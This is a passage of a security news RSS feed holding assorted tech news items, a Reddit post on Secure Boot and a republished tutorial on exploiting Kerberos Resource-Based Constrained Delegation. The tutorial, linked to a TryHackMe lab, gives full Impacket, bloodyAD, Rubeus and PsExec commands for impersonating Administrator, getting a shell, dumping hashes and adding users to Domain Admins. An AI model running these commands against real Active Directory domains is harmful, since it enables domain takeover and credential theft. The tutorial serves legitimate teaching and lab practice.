<description><![CDATA[Shifting demands and political ideology have left the industry vulnerable to global competition from cheap Chinese carsEarlier this month, an intriguing new Detroit-based electric vehicle startup hit the market – Slate Auto, a Jeff Bezos-backed venture offering something US buyers rarely see thes...]]></description>
<link>https://tsecurity.de/de/3645275/it-nachrichten/as-auto-costs-rise-will-the-us-miss-the-golden-age-of-electric-vehicles/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645275/it-nachrichten/as-auto-costs-rise-will-the-us-miss-the-golden-age-of-electric-vehicles/</guid>
<pubDate>Sat, 04 Jul 2026 13:17:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Shifting demands and political ideology have left the industry vulnerable to global competition from cheap Chinese cars</p><p>Earlier this month, an intriguing new Detroit-based electric vehicle startup hit the market – <a href="https://www.google.com/aclk?sa=L&amp;pf=1&amp;ai=DChsSEwir27Cr16yVAxXwisIIHfM9CQ8YACICCAEQABoCamY&amp;co=1&amp;ase=2&amp;gclid=Cj0KCQjwr4jSBhCSARIsAOX1E-IH-4mSX4ivEa1oH1f2RlX0HzST0YjCEXd7c6375u5wxiVgI2YWtY8aAvY3EALw_wcB&amp;cid=CAASugHkaDyW6fztRnTBe8odaiXQvWUcZdNQ2x8k2NwDdNRoATbrgjUpkbLUumb96H8RpULbNiyx8AJvNP8Zf68kMRdIGXaos7uGcePtagge2HYblnicmUGqpLEzzn_Ce8vgzPQxVec3vegaDCqa0eTmMRZDvq3tVvP553KRkVyeRvw-I2B6CDlioyg4EkpYs7TMUR2BWBXX9ntt7vH0aPHE5-eNmGCQ76BHsJs5RzYQ5rol9z72yz4gK7dtzCA&amp;cce=2&amp;category=acrcp_v1_32&amp;sig=AOD64_0f5yRfZTOlBSGP0AgaDShoYbG4iw&amp;q&amp;nis=4&amp;adurl=https://www.slate.auto/en?utm_medium%3Dpaidsearch%26utm_source%3Dgoogle%26utm_campaign%3Dslategtm%26utm_term%3Dbrand%26utm_content%3Dsearch%26gad_source%3D1%26gad_campaignid%3D22511586193%26gbraid%3D0AAAAA_B-XWPapX3BNVdbJG1I4J4Oeis4M%26gclid%3DCj0KCQjwr4jSBhCSARIsAOX1E-IH-4mSX4ivEa1oH1f2RlX0HzST0YjCEXd7c6375u5wxiVgI2YWtY8aAvY3EALw_wcB&amp;ved=2ahUKEwiMiqmr16yVAxUolSsGHfasHhUQ0Qx6BAgKEAE">Slate Auto</a>, a Jeff Bezos-backed venture offering something US buyers rarely see these days – a pick up truck billed as “affordable”.</p><p>Its base price is $24,950, making it one of the lowest-cost autos in the US market and close to half the price of the average new vehicle. But as the US contends with sharply rising auto costs, even Slate may be getting left behind in the global electric vehicle (EV) transition. The global EV industry is entering a golden age powered by <a href="https://www.motortrend.com/reviews/quick-drive-geely-ex2-chinese-ev">cheap Chinese cars</a> that can be bought for as little as $10,000.</p> <a href="https://www.theguardian.com/us-news/2026/jul/04/electric-cars-vehicles-united-states">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[I found 4 Bluetooth gadgets that are highly functional - and cheap]]></title>
<description><![CDATA[Some of my favorite practical Bluetooth gadgets are cheaper than you think.]]></description>
<link>https://tsecurity.de/de/3645245/it-nachrichten/i-found-4-bluetooth-gadgets-that-are-highly-functional-and-cheap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645245/it-nachrichten/i-found-4-bluetooth-gadgets-that-are-highly-functional-and-cheap/</guid>
<pubDate>Sat, 04 Jul 2026 13:03:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Some of my favorite practical Bluetooth gadgets are cheaper than you think.]]></content:encoded>
</item>
<item>
<title><![CDATA[Exploiting Resource-Based Constrained Delegation (RBCD)]]></title>
<description><![CDATA[In this article, we will examine what Resource-Based Constrained Delegation (RBCD) is, and how it can be exploited to achieve a full Computer Account takeover.1. Kerberos Delegation 101If you’re new to Kerberos authentication, I have previously written an article here. To recap, here is the quick...]]></description>
<link>https://tsecurity.de/de/3644803/hacking/exploiting-resource-based-constrained-delegation-rbcd/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644803/hacking/exploiting-resource-based-constrained-delegation-rbcd/</guid>
<pubDate>Sat, 04 Jul 2026 07:06:58 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this article, we will examine what Resource-Based Constrained Delegation (RBCD) is, and how it can be exploited to achieve a full Computer Account takeover.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5hOdCuivyESufU-bOXfBSg.png"></figure><h3>1. Kerberos Delegation 101</h3><p>If you’re new to Kerberos authentication, I have previously written an article <a href="https://medium.com/cybersecuritywriteups/how-kerberos-authentication-in-active-directory-works-a-hackers-pov-6984489299dc?sharedUserId=indigoshadowwashere">here</a>. To recap, here is the quick breakdown of Kerberos authentication protocol:</p><ul><li><strong>Authentication (TGT):</strong> When a user logs in, they prove who they are to the Domain Controller (DC) using their password. In return, the DC hands them a <strong>Ticket-Granting Ticket (TGT)</strong>. This is like a security badge that lets them request access to specific things later.</li><li><strong>Accessing a Service (TGS):</strong> When the user wants to access a specific server or service (like a file share), they show their TGT to the DC. The DC checks it and hands them a <strong>Ticket-Granting Service (TGS)</strong> — often called a <em>service ticket</em> — specifically for that target server. The user hands that TGS to the server to log in.</li></ul><h4>The Delegation Problem</h4><p>Sometimes, Server A needs to talk to Server B on your behalf (e.g., a web server checking a backend database for you). To do this, Server A needs to impersonate you. Microsoft built three historical ways to handle this:</p><ul><li><strong>Unconstrained Delegation:</strong> You send your TGS <em>and</em> a copy of your TGT to Server A. Server A now possesses your full identity badge and can impersonate you to <strong>any</strong> service on the network. (Highly dangerous).</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*y5kfNxRiZGHgcXoLPuQK_g.png"><figcaption>Unconstrained delegation</figcaption></figure><ul><li><strong>Constrained Delegation:</strong> You send a TGS to Server A. If Server A is explicitly trusted to delegate to Server B, it passes your TGS to the DC and says, “Give me a ticket to Server B for this user.” Crucially, your initial ticket (known as evidence ticket) must have a flag called <strong>FORWARDABLE</strong> set, meaning you allow it to be passed along. If you are marked as a sensitive user, that flag is blocked.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uAFn0MMkEgHQLYafqz73kQ.png"><figcaption>Constrained delegation</figcaption></figure><ul><li><strong>Protocol Transition (S4U2Self):</strong> What happens if you login to Server A using something other than Kerberos (like a web form or NTLM)? Server A doesn’t have a Kerberos TGS from you to pass along. With Protocol Transition enabled, Server A can use an extension called <strong>S4U2Self</strong> to ask the DC: <em>“Hey, pretend this user logged in via Kerberos and give me a service ticket for them out of thin air.”</em> To stop everyone from doing this, the server account must have a special attribute set: TrustedToAuthForDelegation.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ulUE1KAXjMrJUa5R40jszA.png"><figcaption>S4U2Self</figcaption></figure><h4><strong>S4U2Self vs S4U2Proxy</strong></h4><p>These 2 terms often come up when it comes to delegation, and it’s useful to really internalise what they mean. If you’re already familiar, please skip this section.</p><p><strong>S4U2Self (“Service for User to Self”)</strong></p><ul><li><strong>What it means:</strong> A service is asking for a ticket for a <strong>User</strong> back <strong>to Self</strong> (itself).</li><li><strong>The Analogy:</strong> Imagine a web server saying to the Domain Controller, <em>“</em>Hey, Bob just logged into my website using a basic password. Can you give me a Kerberos ticket for Bob <strong>to myself</strong> so I can verify his identity locally?”</li></ul><p>Any account that possesses a Service Principal Name (SPN) — which includes every default computer account in a domain — can successfully invoke S4U2Self for any user.</p><p>The catch is simple: if the account does not have the classic Protocol Transition flag enabled, the DC will still issue the ticket for the arbitrary user (such as a Domain Admin), but it will explicitly stamp the ticket flag as <strong>NOT FORWARDABLE</strong>.</p><p><strong>S4U2Proxy (“Service for User to Proxy”)</strong></p><ul><li><strong>What it means:</strong> A service takes a user’s ticket and acts as a <strong>Proxy</strong> to send it somewhere else.</li><li><strong>The Analogy:</strong> Now that the web server has a ticket for Bob, it needs to look up Bob’s data on a backend database server. It hands Bob’s ticket back to the Domain Controller and says, “I need to act as a <strong>proxy</strong> for Bob. Please trade this in for a ticket that lets me talk to the Database Server on his behalf.”</li></ul><p>In classic constrained delegation, if you present a <strong>non-forwardable</strong> evidence ticket to S4U2Proxy, the DC rejects the request with a BAD_OPTION error. This safely blocks unauthorized impersonation.</p><h3>2. Here Comes RBCD</h3><p>To fix the administrative headaches of classic constrained delegation, Microsoft introduced RBCD in Windows Server 2012.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ljKDptQpWqX-osc5M7ARug.png"></figure><h4>Flipping the Trust Direction</h4><p>Constrained delegation operates on an <strong>outgoing</strong> trust model, while RBCD operates on an <strong>incoming</strong> trust model.</p><ul><li><strong>Classic Constrained Delegation:</strong> Domain Admins must configure this. If Server A needs to delegate to Server B, a Domain Admin edits the properties of <strong>Server A</strong> (msDS-AllowedToDelegateTo) to say: <em>"Server A is allowed to talk to Server B."</em></li><li><strong>Resource-Based Constrained Delegation (RBCD):</strong> This flips the control to the receiving resource. Instead of configuring Server A, a setting is modified on <strong>Server B</strong> (msDS-AllowedToActOnBehalfOfOtherIdentity) to say: <em>"I trust Server A to impersonate users to me."</em></li></ul><h4>The Weakness in RBCD</h4><p>Because Microsoft designed RBCD to let local administrators manage their own resources without bugging Domain Admins every time they deployed an application, the permissions required to configure RBCD are much lower.</p><p><strong>Anyone who has write permissions over a computer object</strong> (like its creator, or an account with delegated local admin rights over that object in Active Directory) <strong>can modify its </strong><strong>msDS-AllowedToActOnBehalfOfOtherIdentity attribute, and exploit RBCD</strong>.</p><p>Also, in classic constrained delegation, if you present a <strong>non-forwardable</strong> evidence ticket to S4U2Proxy, the DC rejects the request with a BAD_OPTION error. However, with RBCD, the DC accepts a non-fordable ticket!</p><blockquote><strong>Why does RBCD work with a non-forwardable ticket?</strong></blockquote><blockquote>This is the key difference between classic constrained delegation and Resource-Based Constrained Delegation (RBCD).</blockquote><blockquote>In classic constrained delegation, the KDC only allows an S4U2Proxy request if the evidence ticket is <strong>FORWARDABLE</strong>. Otherwise, the request is rejected.</blockquote><blockquote>With RBCD, the KDC instead checks whether the <strong>target resource trusts the requesting service</strong> through the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. If that trust exists, the KDC allows the S4U2Proxy request even if the evidence ticket is <strong>not forwardable</strong>.</blockquote><blockquote>This is what makes RBCD exploitable: any account with an SPN can obtain a non-forwardable ticket using <strong>S4U2Self</strong>, and RBCD allows that ticket to be used for <strong>S4U2Proxy</strong> as long as the target resource trusts the requesting service.</blockquote><h3>3. Step-by-Step RBCD Exploit Chain</h3><figure><img alt="" src="https://cdn-images-1.medium.com/proxy/1*ulUE1KAXjMrJUa5R40jszA.png"></figure><p>Suppose we find a computer account (“Service B”) where we can modify the RBCD setting (i.e. msDS-AllowedToActOnBehalfOfOtherIdentity) to trust “Service A” to impersonate users. So what?</p><p>If we can control Service A, we can get a TGS for any user (say Domain Admin), and impersonate that user to get full access to Service B!</p><p>But how can we find a Service A that you can control easily? Create your own Computer Account! By default, a domain user is allowed to add up to 10 computers to the domain.</p><blockquote><strong>Wait, Computer Accounts = Service?</strong></blockquote><blockquote>In Active Directory, Computer Accounts are fundamentally identical to User Accounts, but with a twist: they are security principals meant for machines, and they automatically possess Service Principal Names (SPNs) like <em>HOST/</em> or <em>RestrictedKrbHost/</em>. Because Kerberos considers any account with an SPN to be a "service," a computer account natively speaks the entire S4U protocol language. This means it has the inherent authority to request tickets via <em>S4U2Self</em> and proxy them via <em>S4U2Proxy</em>.</blockquote><h4>Prerequisites for exploit</h4><ul><li>A compromised user account that has Write permissions to a computer object’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute</li><li>Another compromised account with an SPN, or the ability to create a new Computer Account (which is possible by default because the MachineAccountQuota attribute allows authenticated users to create up to 10 computer objects unless administrators have changed this setting).</li></ul><h4>Steps for Exploit</h4><p>If you like to try this out, you can use this on the TryHackMe room Operation Endgame <a href="https://tryhackme.com/room/operationendgame">here</a>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KzNA9wcLunDaNLjla6wqwg.png"></figure><ol><li><strong>Create a Computer Account (i.e. “Service A”) — </strong>If you already have access to an account with an SPN, you can skip this step.</li><li><strong>Configure target computer object (i.e. “Service B”) for RBCD —</strong> to let<strong> </strong>“Service B” trust “Service A” to impersonate any user.</li><li><strong>Get a service ticket to Service B impersonating Administrator user (or any other user)</strong> — The service (i.e. SPN) must correspond to a service running on the target machine (e.g. cifs, HOST, HTTP or ldap).</li><li><strong>Pass the ticket — </strong>e.g. to get a shell as Administrator on target Computer, access the file system on the target Computer, or harvest credentials from the target Computer (secretsdump.py)</li></ol><h4>Linux Commands for Exploit</h4><pre>##### Step 1: Create a computer account ######<br><br># Option 1: Using Bloodyad<br>$ bloodyad -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --host "$DC_HOST" add computer 'SomeName$' 'SomePassword'<br><br># Option 2: Using Impacket script<br>$ addcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host "$DC_HOST" -domain-netbios "$DOMAIN" "$DOMAIN"/"$USER":"$PASSWORD"<br><br>##### Step 2: Configure RBCD on target Computer Account ######<br><br># Using Impacket rbcd.py script<br>$ rbcd.py -delegate-from "$CONTROLLED_ACCOUNT" -delegate-to "$TARGET$" -dc-ip "$DC_HOST" -action 'write' "$DOMAIN/$USER:$PASSWORD"<br><br>##### Step 3: Get a Service Ticket for Administrator ######<br><br># Using Impacket script getST.py smbc<br>$ getST.py -spn 'cifs/target' -impersonate "Administrator" -dc-ip "$DC_IP" "$DOMAIN"/"$ACCOUNT_WITH_SPN":"$PASSWORD"<br><br>##### Step 4: Pass the ticket to get a shell as Administrator on target computer ######<br><br>$ export KRB5CCNAME=administrator.ccache<br><br># The following should work with a cifs ticket.<br><br># Option 1: Get a shell with psexec.py<br>$ python3 psexec.py &lt;domain&gt;/administrator@&lt;target_ip&gt; -k -no-pass<br><br># Option 2: Do a secretsdump to extract the hashes<br>$ python3 secretsdump.py -k &lt;target&gt;<br><br># Option 3: access the file system with smbclient<br>$ python3 smbclient.py -k -no-pass &lt;target&gt;<br><br># Option 4: Use bloodyAD to add user to Domain Admins<br># bloodyAD -d &lt;domain&gt; -k --host &lt;hostname&gt; add groupMember "Domain Admins" &lt;username&gt;<br></pre><h4>Windows Commands for Exploit</h4><p>You will need to use <a href="https://github.com/kevin-robertson/powermad">this</a> for step 1:</p><pre>##### Step 1: Create a computer account ######<br># Using powermad<br>New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)<br>$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid<br><br>##### Step 2: Configure RBCD on target Computer Account ######<br><br># This security descriptor grants the newly created computer account permission to act on behalf of users to the target computer.<br>$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"<br>$SDBytes = New-Object byte[] ($SD.BinaryLength)<br>$SD.GetBinaryForm($SDBytes, 0)<br><br>Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}<br><br>##### Step 3: Get a Service Ticket for Administrator ######<br><br>Rubeus.exe hash /password:Summer2018!<br>Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt<br><br>##### Step 4: Pass the ticket <br># Option 1: Executing command on target as Administrator<br>.\PsExec.exe -accepteula \\$TARGET cmd<br><br># Option 2: Accessing file system on target computer<br>ls \\$TARGET\C$</pre><p>Hope you found this helpful!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=a63a02db6ca6" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/exploiting-resource-based-constrained-delegation-rbcd-a63a02db6ca6">Exploiting Resource-Based Constrained Delegation (RBCD)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hypothetical: what if Microsoft pushes through Secure Boot mandate and does not allow shim files to run with Windows 12 in order to act as a "Linux killer" (but of course never says that is the reason)?]]></title>
<description><![CDATA[Even though Microsoft has done the opposite and said manufacturers must allow Secure Boot to be turned off, I have been thinking about Microsoft going down the route Apple has and saying to new computers "you must run Windows as your only operating system on hardware". There are no public indicat...]]></description>
<link>https://tsecurity.de/de/3644649/linux-tipps/hypothetical-what-if-microsoft-pushes-through-secure-boot-mandate-and-does-not-allow-shim-files-to-run-with-windows-12-in-order-to-act-as-a-linux-killer-but-of-course-never-says-that-is-the-reason/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644649/linux-tipps/hypothetical-what-if-microsoft-pushes-through-secure-boot-mandate-and-does-not-allow-shim-files-to-run-with-windows-12-in-order-to-act-as-a-linux-killer-but-of-course-never-says-that-is-the-reason/</guid>
<pubDate>Sat, 04 Jul 2026 04:09:16 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Even though Microsoft has done the opposite and said manufacturers must allow Secure Boot to be turned off, I have been thinking about Microsoft going down the route Apple has and saying to new computers "you <em>must</em> run Windows as your only operating system on hardware".</p> <p>There are no public indications or statements that suggest or show Microsoft is planning on this. However, last month, Microsoft let UEFI Secure Boot certificates expire, which many people feel is testing the waters for such a move. I feel such a move is plausible despite what I said, because Microsoft might see it as plugging a hole in people leaving Windows before it is too late, assuming the average person won't buy a new system or go through the hoops to force it off. I think such a move could go either way. Because on one hand unfortunately, most people are relatively tech illiterate, and on the other hand, there is an effect of secrecy.</p> <p>The key reason I think this is something people should consider as a possibility is this: it already exists on cell phones. I did some research and I found that such a mandate would be technically feasible but face more legal friction because cell phones are not classified as general purpose computing (though I think they should be because of how they evolved). Apple has done it to MacOS recently, making it very hard to install Linux on newer hardware. That is the reason I think a Microsoft push to block Linux (or any non-Microsoft OS for that matter) to run is something people should worry about.</p> <p>I am not ranting about this, I am just curious about how such a decision would affect Linux developers and core users, especially considering many Linux users strategically use Windows OEM hardware to reach discounts and often higher quality parts because the relative discounts of these manufacturers and the premiums they get often outweigh the cost of the licensing and hardware compatibility (TPM chips and the like), or are using them because they were passively using Windows for years until the software bloat got intolerable for them (or were missing the TPM chip or something else Windows 11 requires).</p> <p>I do not think they will do it because of the antitrust and bad press talking points. But I feel it is likely/plausible enough to consider for developers. Ultimately, I think that the reason they haven't tried this is that antitrust law issue.</p> <p>Here is a personal story: When I first bought my HP OmniBook X which now dual boots Ubuntu and Fedora, I got an error. I freaked out when I plugged in the Ventoy USB after seeing "Secure Boot Violation" or something like that. I was about to return it until I looked up if you could disable it. Fortunately you can. It <em>is</em> possible to run Linux through a backdoor Microsoft provided called shim which was created for that purpose. But that backdoor could be revoked in the future, and they could also potentially say "you can't sign your own keys" (which already seems to be the case on many of these machines, and even if it isn't it is yet another hoop to hop through).</p> <p>The bottom line: if it comes to this, will you switch to Linux certified laptops, keep old systems, or import from markets in Europe (the EU has digital sovereignty laws that would not like this) or somewhere else where Microsoft is forced to allow it off supply you those same hardware? Or something else?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/DestroyRepublicans"> /u/DestroyRepublicans </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1umqld4/hypothetical_what_if_microsoft_pushes_through/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1umqld4/hypothetical_what_if_microsoft_pushes_through/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[This $550 Dell 15 Laptop beats those cheap 4GB laptop deals — with 16GB RAM and Core i5 power, it's a better buy for back-to-school and office work]]></title>
<description><![CDATA[Dell 15 Laptop delivers solid everyday performance for studying and remote work and it's currently priced at under $550.]]></description>
<link>https://tsecurity.de/de/3644229/it-nachrichten/this-550-dell-15-laptop-beats-those-cheap-4gb-laptop-deals-with-16gb-ram-and-core-i5-power-its-a-better-buy-for-back-to-school-and-office-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644229/it-nachrichten/this-550-dell-15-laptop-beats-those-cheap-4gb-laptop-deals-with-16gb-ram-and-core-i5-power-its-a-better-buy-for-back-to-school-and-office-work/</guid>
<pubDate>Fri, 03 Jul 2026 20:32:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Dell 15 Laptop delivers solid everyday performance for studying and remote work and it's currently priced at under $550.]]></content:encoded>
</item>
<item>
<title><![CDATA[David Potter, the man who put Psion in the palm of your hand, logs off at 82]]></title>
<description><![CDATA[Physicist, philanthropist, and pioneer of pocket computers, SSDs, smartphones… and duvets]]></description>
<link>https://tsecurity.de/de/3644141/it-nachrichten/david-potter-the-man-who-put-psion-in-the-palm-of-your-hand-logs-off-at-82/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644141/it-nachrichten/david-potter-the-man-who-put-psion-in-the-palm-of-your-hand-logs-off-at-82/</guid>
<pubDate>Fri, 03 Jul 2026 19:32:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Physicist, philanthropist, and pioneer of pocket computers, SSDs, smartphones… and duvets]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta reuses old RAM in new servers with custom bridge chip]]></title>
<description><![CDATA[With the cost of new RAM soaring, Meta has found a thrifty way to reuse older memory in newer servers.



The performance of about 40% of Meta’s millions of servers is limited by a lack of memory, the company said — but it has a surplus of older DIMMs from decommissioned servers, because RAM chip...]]></description>
<link>https://tsecurity.de/de/3643938/it-security-nachrichten/meta-reuses-old-ram-in-new-servers-with-custom-bridge-chip/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643938/it-security-nachrichten/meta-reuses-old-ram-in-new-servers-with-custom-bridge-chip/</guid>
<pubDate>Fri, 03 Jul 2026 18:26:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>With the cost of new RAM soaring, Meta has found a thrifty way to reuse older memory in newer servers.</p>



<p>The performance of about 40% of Meta’s millions of servers is limited by a lack of memory, the company said — but it has a surplus of older DIMMs from decommissioned servers, because RAM chips can last about twice as long as the rest of the machine.</p>



<p>To profit from this imbalance, it developed a custom Computer Express Link (CXL) chip it calls Vistara, and associated software, to decouple older memory from server memory channels, enabling its reuse in new machines alongside their native memory. Using the older RAM with the CXL interface doesn’t significantly affect performance — although it would have done if the older DIMMs were plugged straight into newer servers.</p>



<p>Kudos to tech site <a href="https://www.theregister.com/systems/2026/06/29/zuck-saves-meta-bucks-by-reusing-memory-from-old-servers-with-a-custom-cxl-asic/5263483" target="_blank" rel="noreferrer noopener">The Register</a> for noticing the development, which Meta described in a technical paper: <a href="https://aisystemcodesign.github.io/papers/isca26/vistara_camera_ready.pdf" target="_blank" rel="noreferrer noopener">Vistara: Making CXL Real — Full Path from ASIC Design and OS Support to Hyperscale Deployment,” setting out how the new technology works</a>.</p>



<p>There is a particular need to be thrifty right now, given the current state of the market. Last year, <a href="https://www.networkworld.com/article/4093752/server-memory-prices-could-double-by-2026-as-ai-demand-strains-supply.html">users were warned that memory prices could double</a> by the end of 2026, while <a href="https://www.computerworld.com/article/4161043/the-memory-shortage-appears-set-to-continue-through-2027.html">the RAM shortage could last until 2027</a>. This week, <a href="https://www.networkworld.com/article/4192382/cheap-chinese-chips-could-offer-way-out-of-ram-price-crisis-apple-suggests.html">Apple suggested using cheap Chinese chips</a>, a move that may well be frowned on by the Trump administration. The Meta development may prove to be an efficient way forward.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta reuses old RAM in new servers with custom bridge chip]]></title>
<description><![CDATA[With the cost of new RAM soaring, Meta has found a thrifty way to reuse older memory in newer servers.



The performance of about 40% of Meta’s millions of servers is limited by a lack of memory, the company said — but it has a surplus of older DIMMs from decommissioned servers, because RAM chip...]]></description>
<link>https://tsecurity.de/de/3643920/it-nachrichten/meta-reuses-old-ram-in-new-servers-with-custom-bridge-chip/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643920/it-nachrichten/meta-reuses-old-ram-in-new-servers-with-custom-bridge-chip/</guid>
<pubDate>Fri, 03 Jul 2026 18:04:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>With the cost of new RAM soaring, Meta has found a thrifty way to reuse older memory in newer servers.</p>



<p>The performance of about 40% of Meta’s millions of servers is limited by a lack of memory, the company said — but it has a surplus of older DIMMs from decommissioned servers, because RAM chips can last about twice as long as the rest of the machine.</p>



<p>To profit from this imbalance, it developed a custom Computer Express Link (CXL) chip it calls Vistara, and associated software, to decouple older memory from server memory channels, enabling its reuse in new machines alongside their native memory. Using the older RAM with the CXL interface doesn’t significantly affect performance — although it would have done if the older DIMMs were plugged straight into newer servers.</p>



<p>Kudos to tech site <a href="https://www.theregister.com/systems/2026/06/29/zuck-saves-meta-bucks-by-reusing-memory-from-old-servers-with-a-custom-cxl-asic/5263483" target="_blank" rel="noreferrer noopener">The Register</a> for noticing the development, which Meta described in a technical paper: <a href="https://aisystemcodesign.github.io/papers/isca26/vistara_camera_ready.pdf" target="_blank" rel="noreferrer noopener">Vistara: Making CXL Real — Full Path from ASIC Design and OS Support to Hyperscale Deployment,” setting out how the new technology works</a>.</p>



<p>There is a particular need to be thrifty right now, given the current state of the market. Last year, <a href="https://www.networkworld.com/article/4093752/server-memory-prices-could-double-by-2026-as-ai-demand-strains-supply.html">users were warned that memory prices could double</a> by the end of 2026, while <a href="https://www.computerworld.com/article/4161043/the-memory-shortage-appears-set-to-continue-through-2027.html">the RAM shortage could last until 2027</a>. This week, <a href="https://www.networkworld.com/article/4192382/cheap-chinese-chips-could-offer-way-out-of-ram-price-crisis-apple-suggests.html">Apple suggested using cheap Chinese chips</a>, a move that may well be frowned on by the Trump administration. The Meta development may prove to be an efficient way forward.</p>



<p><em>This article first appeared on <a href="https://www.networkworld.com/article/4192827/meta-reuses-old-ram-in-new-servers-with-custom-bridge-chip.html">Network World</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Abuse Blogspot and PowerShell Download Cradles to Deploy PureLog Steale]]></title>
<description><![CDATA[Hackers have found a clever way to sneak data-stealing malware onto victims’ computers by hiding their tracks inside a trusted platform, Google Blogspot. Researchers recently uncovered a campaign abusing this blogging service alongside native Windows tools to quietly install an…
Read more →
The p...]]></description>
<link>https://tsecurity.de/de/3643653/it-security-nachrichten/hackers-abuse-blogspot-and-powershell-download-cradles-to-deploy-purelog-steale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643653/it-security-nachrichten/hackers-abuse-blogspot-and-powershell-download-cradles-to-deploy-purelog-steale/</guid>
<pubDate>Fri, 03 Jul 2026 15:23:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hackers have found a clever way to sneak data-stealing malware onto victims’ computers by hiding their tracks inside a trusted platform, Google Blogspot. Researchers recently uncovered a campaign abusing this blogging service alongside native Windows tools to quietly install an…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-abuse-blogspot-and-powershell-download-cradles-to-deploy-purelog-steale/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-abuse-blogspot-and-powershell-download-cradles-to-deploy-purelog-steale/">Hackers Abuse Blogspot and PowerShell Download Cradles to Deploy PureLog Steale</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Abuse Blogspot and PowerShell Download Cradles to Deploy PureLog Steale]]></title>
<description><![CDATA[Hackers have found a clever way to sneak data-stealing malware onto victims’ computers by hiding their tracks inside a trusted platform, Google Blogspot. Researchers recently uncovered a campaign abusing this blogging service alongside native Windows tools to quietly install an information steale...]]></description>
<link>https://tsecurity.de/de/3643477/it-security-nachrichten/hackers-abuse-blogspot-and-powershell-download-cradles-to-deploy-purelog-steale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643477/it-security-nachrichten/hackers-abuse-blogspot-and-powershell-download-cradles-to-deploy-purelog-steale/</guid>
<pubDate>Fri, 03 Jul 2026 14:09:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
